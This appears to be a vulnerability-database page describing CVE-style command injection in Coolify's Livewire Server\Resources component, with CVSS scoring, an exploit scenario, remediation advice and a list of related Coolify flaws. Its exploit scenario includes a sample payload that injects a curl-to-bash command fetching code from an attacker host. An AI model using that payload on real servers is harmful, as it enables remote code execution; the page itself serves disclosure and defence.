Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Network-reachable Livewire endpoint (AV:N/AC:L), requires an authenticated team account (PR:L), no user interaction, and unsanitized shell injection yields full OS command execution (C:H/I:H/A:H).
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
2DescriptionCVE.org
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to 4.0.0-beta.471, the Livewire component Server\Resources exposes public methods (startUnmanaged, stopUnmanaged, restartUnmanaged) that accept a container ID parameter directly from the browser without any sanitization or escaping. This parameter is interpolated directly into shell commands executed via SSH on managed servers, enabling any authenticated team member to execute arbitrary OS commands on remote servers. This issue is fixed in version 4.0.0-beta.471.
AnalysisAI
OS command injection in Coolify's self-hosted server-management platform (all versions prior to 4.0.0-beta.471) lets any authenticated team member execute arbitrary shell commands on any managed remote server. The flaw lives in the Livewire Server\Resources component, whose public startUnmanaged/stopUnmanaged/restartUnmanaged methods take a browser-supplied container ID and interpolate it unescaped into SSH-executed shell commands. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an authenticated Coolify team account (CVSS PR:L) and access to the Livewire Server\Resources component's startUnmanaged, stopUnmanaged, or restartUnmanaged methods - the attacker supplies a malicious container ID parameter containing shell metacharacters, which Coolify interpolates unescaped into an SSH-executed shell command. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, base 8.8) indicates network-reachable, low-complexity exploitation requiring only low privileges (PR:L) and no user interaction, with full compromise (C:H/I:H/A:H) of the affected system. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A low-privileged member of a Coolify team opens the browser dev tools (or a crafted request) and invokes the Livewire startUnmanaged method with a container ID payload such as 'x; curl attacker.sh | bash'. Coolify concatenates this into a shell command and executes it over SSH on the selected managed server, running the attacker's commands with Coolify's SSH privileges. … |
| Remediation | Vendor-released patch: upgrade Coolify to 4.0.0-beta.471 or later, which adds sanitization/escaping of the container ID parameter in the Server\Resources Livewire component (see PR 9172 and commit 944a038 referenced in advisory GHSA-rh5x-qx77-fq9v). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Audit all Coolify team accounts and revoke access for non-essential personnel; document business justification for each remaining team member. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Coolify, a self-hosted server management platform, allows authenticated users to inject OS commands through the Git Repo
A command injection vulnerability in Coolify's Database Backup functionality allows authenticated users with application
Coolify through v4.0.0-beta.434 exposes the root user's SSH private key to low-privileged team members. Any user with ba
Cross-team authorization bypass in Coolify (open-source self-hosted PaaS) before 4.0.0-beta.474 allows an authenticated,
Coolify before 4.0.0-beta.445 allows command injection through docker-compose.yaml parameters. If a victim creates an ap
Coolify versions prior to v4.0.0-beta.420.7 are vulnerable to a remote code execution vulnerability in the project deplo
Coolify versions prior to v4.0.0-beta.420.6 are vulnerable to a remote code execution vulnerability in the application d
Authenticated OS command injection in Coolify before 4.0.0-beta.471 lets any user holding destination management permiss
Authenticated remote code execution in Coolify (self-hosted PaaS) before 4.0.0-beta.470 lets a low-privileged authentica
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. [CVSS 8.8 HIGH]
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0
An authenticated command injection vulnerability in Coolify's PostgreSQL initialization script handling allows attackers
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-41983